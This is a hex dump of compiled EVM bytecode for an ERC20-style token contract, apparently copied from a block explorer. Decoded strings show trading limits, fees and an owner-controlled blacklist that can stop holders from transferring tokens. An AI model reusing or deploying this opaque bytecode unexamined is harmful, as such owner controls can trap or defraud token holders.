565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614f466025836141e8565b9150614f5182614eea565b604082019050919050565b60006020820190508181036000830152614f7581614f39565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614fd86023836141e8565b9150614fe382614f7c565b604082019050919050565b6000602082019050818103600083015261500781614fcb565b9050919050565b7f596f752068617665206265656e20626c61636b6c69737465642066726f6d207460008201527f72616e73666572696e6720746f6b656e73000000000000000000000000000000602082015250565b600061506a6031836141e8565b91506150758261500e565b604082019050919050565b600060208201905081810360008301526150998161505d565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b60006150d66016836141e8565b91506150e1826150a0565b602082019050919050565b60006020820190508181036000830152615105816150c9565b9050919050565b7f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60008201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b60208201527f20616c6c6f7765642e0000000000000000000000000000000000000000000000604082015250565b600061518e6049836141e8565b91506151998261510c565b606082019050919050565b600060208201905081810360008301526151bd81615181565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b60006152206035836141e8565b915061522b826151c4565b604082019050919050565b6000602082019050818103600083015261524f81615213565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b600061528c6013836141e8565b915061529782615256565b602082019050919050565b600060208201905081810360008301526152bb8161527f565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b600061531e6036836141e8565b9150615329826152c2565b604082019050919050565b6000602082019050818103600083015261534d81615311565b9050919050565b600061535f826142fb565b915061536a836142fb565b92508282101561537d5761537c614791565b5b828203905092915050565b60008160011c9050919050565b6000808291508390505b60018511156153df578086048111156153bb576153ba614791565b5b60018516156153ca5780820291505b80810290506153d885615388565b945061539f565b94509492505050565b6000826153f857600190506154b4565b8161540657600090506154b4565b816001811461541c576002811461542657615455565b60019150506154b4565b60ff84111561543857615437614791565b5b8360020a91508482111561544f5761544e614791565b5b506154b4565b5060208310610133831016604e8410600b841016171561548a5782820a90508381111561548557615484614791565b5b6154b4565b6154978484846001615395565b925090508184048111156154ae576154ad614791565b5b81810290505b9392505050565b60006154c6826142fb565b91506154d1836144f8565b92506154fe7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846153e8565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050615573816142cf565b92915050565b60006020828403121561558f5761558e614298565b5b600061559d84828501615564565b91505092915050565b6000819050919050565b60006155cb6155c66155c1846155a6565b6143d4565b6142fb565b9050919050565b6155db816155b0565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b615616816142bd565b82525050565b6000615628838361560d565b60208301905092915050565b6000602082019050919050565b600061564c826155e1565b61565681856155ec565b9350615661836155fd565b8060005b83811015615692578151615679888261561c565b975061568483615634565b925050600181019050615665565b5085935050505092915050565b600060a0820190506156b4600083018861444e565b6156c160208301876155d2565b81810360408301526156d38186615641565b90506156e2606083018561452f565b6156ef608083018461444e565b9695505050505050565b600060608201905061570e600083018661444e565b61571b602083018561444e565b615728604083018461444e565b949350505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b600061578c6021836141e8565b915061579782615730565b604082019050919050565b600060208201905081810360008301526157bb8161577f565b9050919050565b600060c0820190506157d7600083018961452f565b6157e4602083018861444e565b6157f160408301876155d2565b6157fe60608301866155d2565b61580b608083018561452f565b61581860a083018461444e565b979650505050505050565b60008151905061583281614305565b92915050565b60008060006060848603121561585157615850614298565b5b600061585f86828701615823565b935050602061587086828701615823565b925050604061588186828701615823565b915050925092509256fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212207502765c0ba5f615c1e34ef49844dc788f7de61bdfe5350dda2ce1a584d8669864736f6c634300080d0033

Deployed Bytecode

0x6080604052600436106103035760003560e01c806395d89b4111610190578063c18bc195116100dc578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610bbb578063f2fde38b14610be6578063f637434214610c0f578063f8b45b0514610c3a5761030a565b8063dd62ed3e14610b28578063e2f4560514610b65578063e884f26014610b905761030a565b8063c18bc19514610a04578063c876d0b914610a2d578063c8c8ebe414610a58578063d257b34f14610a83578063d85ba06314610ac0578063dbc09ab814610aeb5761030a565b8063a8b9f94d11610149578063b62496f511610123578063b62496f51461094a578063bbc0c74214610987578063c0246668146109b2578063c17b5b8c146109db5761030a565b8063a8b9f94d146108b9578063a9059cbb146108e4578063aacebbe3146109215761030a565b806395d89b41146107a75780639a7a23d6146107d25780639c3b4fdc146107fb5780639fccce3214610826578063a0d82dc514610851578063a457c2d71461087c5761030a565b80634a62bb651161024f578063715018a6116102085780638095d564116101e25780638095d564146107135780638a8c523c1461073c5780638da5cb5b14610753578063924de9b71461077e5761030a565b8063715018a6146106a8578063751039fc146106bf5780637571336a146106ea5761030a565b80634a62bb65146105825780634fbee193146105ad5780636a486a8e146105ea5780636b41ae0c146106155780636ddd17131461064057806370a082311461066b5761030a565b80631a8145bb116102bc57806323b872dd1161029657806323b872dd146104b2578063313ce567146104ef578063395093511461051a57806349bd5a5e146105575761030a565b80631a8145bb146104335780631f3fed8f1461045e578063203e727e146104895761030a565b806306fdde031461030f578063095ea7b31461033a57806310d5de53146103775780631694505e146103b457806318160ddd146103df5780631816467f1461040a5761030a565b3661030a57005b600080fd5b34801561031b57600080fd5b50610324610c65565b6040516103319190614276565b60405180910390f35b34801561034657600080fd5b50610361600480360381019061035c9190614331565b610cf7565b60405161036e919061438c565b60405180910390f35b34801561038357600080fd5b5061039e600480360381019061039991906143a7565b610d15565b6040516103ab919061438c565b60405180910390f35b3480156103c057600080fd5b506103c9610d35565b6040516103d69190614433565b60405180910390f35b3480156103eb57600080fd5b506103f4610d59565b604051610401919061445d565b60405180910390f35b34801561041657600080fd5b50610431600480360381019061042c91906143a7565b610d63565b005b34801561043f57600080fd5b50610448610eba565b604051610455919061445d565b60405180910390f35b34801561046a57600080fd5b50610473610ec0565b604051610480919061445d565b60405180910390f35b34801561049557600080fd5b506104b060048036038101906104ab9190614478565b610ec6565b005b3480156104be57600080fd5b506104d960048036038101906104d491906144a5565b610ff0565b6040516104e6919061438c565b60405180910390f35b3480156104fb57600080fd5b506105046110c9565b6040516105119190614514565b60405180910390f35b34801561052657600080fd5b50610541600480360381019061053c9190614331565b6110d2565b60405161054e919061438c565b60405180910390f35b34801561056357600080fd5b5061056c611185565b604051610579919061453e565b60405180910390f35b34801561058e57600080fd5b506105976111a9565b6040516105a4919061438c565b60405180910390f35b3480156105b957600080fd5b506105d460048036038101906105cf91906143a7565b6111bc565b6040516105e1919061438c565b60405180910390f35b3480156105f657600080fd5b506105ff611212565b60405161060c919061445d565b60405180910390f35b34801561062157600080fd5b5061062a611218565b604051610637919061445d565b60405180910390f35b34801561064c57600080fd5b5061065561121e565b604051610662919061438c565b60405180910390f35b34801561067757600080fd5b50610692600480360381019061068d91906143a7565b611231565b60405161069f919061445d565b60405180910390f35b3480156106b457600080fd5b506106bd611279565b005b3480156106cb57600080fd5b506106d46113d1565b6040516106e1919061438c565b60405180910390f35b3480156106f657600080fd5b50610711600480360381019061070c9190614585565b61148c565b005b34801561071f57600080fd5b5061073a600480360381019061073591906145c5565b61157e565b005b34801561074857600080fd5b50610751611698565b005b34801561075f57600080fd5b5061076861176e565b604051610775919061453e565b60405180910390f35b34801561078a57600080fd5b506107a560048036038101906107a09190614618565b611798565b005b3480156107b357600080fd5b506107bc61184c565b6040516107c99190614276565b60405180910390f35b3480156107de57600080fd5b506107f960048036038101906107f49190614585565b6118de565b005b34801561080757600080fd5b50610810611a11565b60405161081d919061445d565b60405180910390f35b34801561083257600080fd5b5061083b611a17565b604051610848919061445d565b60405180910390f35b34801561085d57600080fd5b50610866611a1d565b604051610873919061445d565b60405180910390f35b34801561088857600080fd5b506108a3600480360381019061089e9190614331565b611a23565b6040516108b0919061438c565b60405180910390f35b3480156108c557600080fd5b506108ce611af0565b6040516108db919061445d565b60405180910390f35b3480156108f057600080fd5b5061090b60048036038101906109069190614331565b611af6565b604051610918919061438c565b60405180910390f35b34801561092d57600080fd5b50610948600480360381019061094391906143a7565b611b14565b005b34801561095657600080fd5b50610971600480360381019061096c91906143a7565b611c6b565b60405161097e919061438c565b60405180910390f35b34801561099357600080fd5b5061099c611c8b565b6040516109a9919061438c565b60405180910390f35b3480156109be57600080fd5b506109d960048036038101906109d49190614585565b611c9e565b005b3480156109e757600080fd5b50610a0260048036038101906109fd91906145c5565b611dde565b005b348015610a1057600080fd5b50610a2b6004803603810190610a269190614478565b611ef8565b005b348015610a3957600080fd5b50610a42612022565b604051610a4f919061438c565b60405180910390f35b348015610a6457600080fd5b50610a6d612035565b604051610a7a919061445d565b60405180910390f35b348015610a8f57600080fd5b50610aaa6004803603810190610aa59190614478565b61203b565b604051610ab7919061438c565b60405180910390f35b348015610acc57600080fd5b50610ad56121ab565b604051610ae2919061445d565b60405180910390f35b348015610af757600080fd5b50610b126004803603810190610b0d9190614645565b6121b1565b604051610b1f919061438c565b60405180910390f35b348015610b3457600080fd5b50610b4f6004803603810190610b4a9190614685565b61233b565b604051610b5c919061445d565b60405180910390f35b348015610b7157600080fd5b50610b7a6123c2565b604051610b87919061445d565b60405180910390f35b348015610b9c57600080fd5b50610ba56123c8565b604051610bb2919061438c565b60405180910390f35b348015610bc757600080fd5b50610bd0612483565b604051610bdd919061445d565b60405180910390f35b348015610bf257600080fd5b50610c0d6004803603810190610c0891906143a7565b612489565b005b348015610c1b57600080fd5b50610c2461264f565b604051610c31919061445d565b60405180910390f35b348015610c4657600080fd5b50610c4f612655565b604051610c5c919061445d565b60405180910390f35b606060038054610c74906146f4565b80601f0160208091040260200160405190810160405280929190818152602001828054610ca0906146f4565b8015610ced5780601f10610cc257610100808354040283529160200191610ced565b820191906000526020600020905b815481529060010190602001808311610cd057829003601f168201915b5050505050905090565b6000610d0b610d046126b9565b84846126c1565b6001905092915050565b601d6020528060005260406000206000915054906101000a900460ff1681565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600254905090565b610d6b6126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610dfa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df190614771565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f0db17895a9d092fb3ca24d626f2150dd80c185b0706b36f1040ee239f56cb87160405160405180910390a380600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b610ece6126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5490614771565b60405180910390fd5b670de0b6b3a76400006103e86001610f73610d59565b610f7d91906147c0565b610f879190614849565b610f919190614849565b811015610fd3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fca906148ec565b60405180910390fd5b670de0b6b3a764000081610fe791906147c0565b60088190555050565b6000610ffd84848461288a565b6110be846110096126b9565b6110b9856040518060600160405280602881526020016158b260289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061106f6126b9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546136059092919063ffffffff16565b6126c1565b600190509392505050565b60006012905090565b600061117b6110df6126b9565b8461117685600160006110f06126b9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265b90919063ffffffff16565b6126c1565b6001905092915050565b7f00000000000000000000000005ccaf7770a36b86eefeabe7b5c25e713861fe4e81565b600b60009054906101000a900460ff1681565b6000601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b60155481565b600b60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112816126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611310576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130790614771565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113db6126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461146a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146190614771565b60405180910390fd5b6000600b60006101000a81548160ff0219169083151502179055506001905090565b6114946126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611523576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151a90614771565b60405180910390fd5b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6115866126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611615576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160c90614771565b60405180910390fd5b82601181905550816012819055508060138190555060135460125460115461163d919061490c565b611647919061490c565b601081905550600a6010541115611693576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168a906149ae565b60405180910390fd5b505050565b6116a06126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461172f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161172690614771565b60405180910390fd5b6001600b60016101000a81548160ff0219169083151502179055506001600b60026101000a81548160ff02191690831515021790555043601b81905550565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6117a06126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461182f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161182690614771565b60405180910390fd5b80600b60026101000a81548160ff02191690831515021790555050565b60606004805461185b906146f4565b80601f0160208091040260200160405190810160405280929190818152602001828054611887906146f4565b80156118d45780601f106118a9576101008083540402835291602001916118d4565b820191906000526020600020905b8154815290600101906020018083116118b757829003601f168201915b5050505050905090565b6118e66126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611975576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161196c90614771565b60405180910390fd5b7f00000000000000000000000005ccaf7770a36b86eefeabe7b5c25e713861fe4e73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119fa90614a40565b60405180910390fd5b611a0d8282613669565b5050565b60135481565b601a5481565b60175481565b6000611ae6611a306126b9565b84611ae1856040518060600160405280602581526020016158da6025913960016000611a5a6126b9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546136059092919063ffffffff16565b6126c1565b6001905092915050565b60115481565b6000611b0a611b036126b9565b848461288a565b6001905092915050565b611b1c6126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611bab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ba290614771565b60405180910390fd5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8616c7a330e3cf61290821331585511f1e2778171e2b005fb5ec60cfe874dc6760405160405180910390a380600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601e6020528060005260406000206000915054906101000a900460ff1681565b600b60019054906101000a900460ff1681565b611ca66126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d2c90614771565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611dd2919061438c565b60405180910390a25050565b611de66126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611e75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e6c90614771565b60405180910390fd5b826015819055508160168190555080601781905550601754601654601554611e9d919061490c565b611ea7919061490c565b601481905550600a6014541115611ef3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611eea906149ae565b60405180910390fd5b505050565b611f006126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611f8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f8690614771565b60405180910390fd5b670de0b6b3a76400006103e86001611fa5610d59565b611faf91906147c0565b611fb99190614849565b611fc39190614849565b811015612005576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ffc90614ad2565b60405180910390fd5b670de0b6b3a76400008161201991906147c0565b600a8190555050565b600f60009054906101000a900460ff1681565b60085481565b60006120456126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146120d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120cb90614771565b60405180910390fd5b620186a060016120e2610d59565b6120ec91906147c0565b6120f69190614849565b821015612138576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161212f90614b64565b60405180910390fd5b6103e86005612145610d59565b61214f91906147c0565b6121599190614849565b82111561219b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219290614bf6565b60405180910390fd5b8160098190555060019050919050565b60105481565b6000601c60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661220957600080fd5b60006122347f00000000000000000000000005ccaf7770a36b86eefeabe7b5c25e713861fe4e611231565b9050600183118015612251575060648161224e9190614849565b83105b612290576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161228790614c62565b60405180910390fd5b6122998361370a565b6122a2846137d6565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16476040516122ea90614cb3565b60006040518083038185875af1925050503d8060008114612327576040519150601f19603f3d011682016040523d82523d6000602084013e61232c565b606091505b50509050809250505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60095481565b60006123d26126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612461576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161245890614771565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124916126b9565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612520576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161251790614771565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361258f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161258690614d3a565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600a5481565b600080828461266a919061490c565b9050838110156126af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126a690614da6565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612730576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161272790614e38565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361279f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161279690614eca565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161287d919061445d565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036128f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128f090614f5c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612968576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161295f90614fee565b60405180910390fd5b600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015612a0c5750600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b612a4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a4290615080565b60405180910390fd5b60008103612a6457612a5f83836000613a13565b613600565b600b60009054906101000a900460ff161561312857612a8161176e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612aef5750612abf61176e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612b285750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612b62575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612b7b5750600560149054906101000a900460ff16155b1561312757600b60019054906101000a900460ff16612c7557601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612c355750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612c74576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c6b906150ec565b60405180910390fd5b5b600f60009054906101000a900460ff1615612e3e57612c9261176e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015612d1957507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612d7157507f00000000000000000000000005ccaf7770a36b86eefeabe7b5c25e713861fe4e73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b15612e3d5743600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541115612df8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612def906151a4565b60405180910390fd5b43600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b601e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612ee15750601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f8857600854811115612f2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612f2290615236565b60405180910390fd5b600a54612f3783611231565b82612f42919061490c565b1115612f83576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612f7a906152a2565b60405180910390fd5b613126565b601e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561302b5750601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561307a57600854811115613075576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161306c90615334565b60405180910390fd5b613125565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661312457600a546130d783611231565b826130e2919061490c565b1115613123576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161311a906152a2565b60405180910390fd5b5b5b5b5b5b600061313330611231565b9050600060095482101590508080156131585750600b60029054906101000a900460ff165b80156131715750600560149054906101000a900460ff16155b80156131c75750601e60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561321d5750601c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156132735750601c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156132b7576001600560146101000a81548160ff02191690831515021790555061329b613ca6565b6000600560146101000a81548160ff0219169083151502179055505b6000600560149054906101000a900460ff16159050601c60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061336d5750601c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561337757600090505b600081156135f057601e60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156133da57506000601454115b156134a75761340760646133f960145488613f8d90919063ffffffff16565b61400790919063ffffffff16565b90506014546016548261341a91906147c0565b6134249190614849565b60196000828254613435919061490c565b925050819055506014546017548261344d91906147c0565b6134579190614849565b601a6000828254613468919061490c565b925050819055506014546015548261348091906147c0565b61348a9190614849565b6018600082825461349b919061490c565b925050819055506135cc565b601e60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561350257506000601054115b156135cb5761352f606461352160105488613f8d90919063ffffffff16565b61400790919063ffffffff16565b90506010546012548261354291906147c0565b61354c9190614849565b6019600082825461355d919061490c565b925050819055506010546013548261357591906147c0565b61357f9190614849565b601a6000828254613590919061490c565b92505081905550601054601154826135a891906147c0565b6135b29190614849565b601860008282546135c3919061490c565b925050819055505b5b60008111156135e1576135e0873083613a13565b5b80856135ed9190615354565b94505b6135fb878787613a13565b505050505b505050565b600083831115829061364d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016136449190614276565b60405180910390fd5b506000838561365c9190615354565b9050809150509392505050565b80601e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219